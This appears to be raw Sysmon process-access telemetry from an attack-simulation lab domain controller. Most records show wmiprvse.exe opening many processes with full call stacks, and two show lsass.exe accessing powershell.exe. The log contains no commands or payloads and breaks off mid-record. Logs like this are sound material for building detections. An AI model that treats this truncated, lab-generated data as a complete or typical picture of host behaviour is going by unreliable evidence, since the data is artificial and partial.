16:52:52.562{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.562{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.561{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.543{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.543{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.543{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.543{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.543{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.543{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.543{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.543{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.543{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.528{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla 